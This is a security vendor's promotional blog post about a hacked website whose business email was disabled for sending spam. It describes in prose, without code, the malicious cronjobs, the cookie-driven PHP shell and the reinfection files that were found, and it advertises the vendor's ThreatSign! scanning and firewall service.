There are many advantages to operating your own website. Chief among them is the ability to host your own business email addresses through this site. It lends your organization credibility - your customers, partners, and stakeholders will regard you as a professional organization that takes electronic communication seriously. That's what makes it so problematic when cybersecurity challenges like malware and spam emails arise that interrupt your ability to connect with your business email addresses.
This has the potential to disrupt the flow of your communication as well as your business's engagement with customers. If hackers or other malicious actors can disable your organization's email addresses with malware, it can impede information sharing and overall progress toward business goals.
We recently observed a situation in which a website owner we work with encountered a major problem with their business email addresses being disabled. This could have led to a catastrophic impact on their operations and bottom line, but we were able to assist them in dealing with it. Here's how we helped them handle it.
What Business Emails Mean to Your Organization
Before we dive deeper into this specific scenario about a company that had its business emails compromised, let's take a closer look at what your company's emails mean to your business.
For most companies, their business emails are what they use to communicate on a daily basis. They talk, collaborate, and otherwise share information through this channel.
Many communication channels fall in and out of popularity, but email always remains consistently used by all organizations. Most of them do this not by asking their employees to use personal emails, but with a company-managed email account.
Businesses also use their company email addresses to communicate with customers as well. They'll reach out to existing customers who need assistance or information about a product or service they've purchased. They'll also reach out to prospective new customers to persuade them to buy from them.
When your business email addresses go down, it can impede your overall progress. An act as simple as one employee clicking on a spam or phishing link could send your company's digital communication into a tailspin, rendering your business emails useless until the problem is rectified.
If you operate a business website that hosts many email addresses (or even just one), then you can see how much of a problem this would be. This has the potential to shut down your business's ability to communicate both internally and externally. You can't talk to people from other departments. You can't connect with customers and clients. You'll find yourself at the mercy of your hosting provider.
The Problem and Solution
We received a message from a website owner telling us they had come across a serious obstacle. Their hosting provider disabled all email addresses they had created through their business website. This was due to spam activity.
So how did we help them?
The site owner signed up for ThreatSign!, Quttera's cybersecurity platform. They opened up a malware removal ticket. That's where our team got to work.
Using ThreatSign!, our malware research team did a thorough investigation into the hacked website. Our research concluded that the site contained multiple malicious mechanisms. These were distributing spam and worst of all, continually infecting and reinfecting the site.
How the Hackers Did It
Luckily for this site owner, they partnered with ThreatSign! to remedy their problem before it became too severe. But for both them and others who want to avoid a similar fate, it's critical to understand the mechanics behind what the hackers did to infiltrate the system.
The attackers used the Linux crond service to run malicious cronjobs every 15-20 minutes. Again, this continual reinfection made the problem endemic.
The first malicious cronjob downloaded a shell script from hellodolly666[.]xyz. The cronjob then executed the script and automatically removed it once the job was complete. During our investigation, we found the script was already offline. The problem was that a shell script such as this can be used through a simple Linux mail client to resend spam or phishing emails.
The second malicious cronjob recreated a malicious PHP file acting as a shell script.
These shell scripts executed shell commands that were provided as cookie strings. Once we had identified and removed the cronjobs, spam activities were halted. This led us to make the assumption that both mechanisms had used the pull/push model to send spam using business emails from the original website.
As we continued our investigation, we found HTACCESS and index.php infectors. Their purpose was to reinfect several index.php files, allowing continuous control over the infected website.
Unfortunately, it's a clever and potentially disastrous attack that can leave your business emails compromised indefinitely on a recurring basis. There is a solution you can enact to mitigate the risk you face, however.
How You Can Keep Your Business Emails Functioning Properly Without Being Compromised
Maintaining good cyber hygiene is the best method for combatting spam and malware. The best way to do this is by partnering with a known, trusted provider of IT and cybersecurity services. By selecting the right platform for your business needs, you'll minimize the chances of a malware attack disrupting your business emails. You'll also keep your business communication flowing - whether it's internal communication between employees or external communication with customers and partners.
The platform you'll want to partner with is Quttera's ThreatSign! Monitoring your website files and establishing a Web Application Firewall (WAF) is a must to avoid such problems and many other issues that are a result of hacking of your web assets. ThreatSign! equips you with these capabilities, enabling you to maintain an equally effective proactive and reactive stance against cyber attacks. It will give you spam and malware protection for your websites.
ThreatSign! will regularly scan your systems to ensure that threats are noted and accounted for. Should you have any existing threats present, ThreatSign! can create an alert and help remedy the situation with minimal impact on your business operations.
Interested to hear more about how you can revolutionize your business's approach to cybersecurity? Contact us today.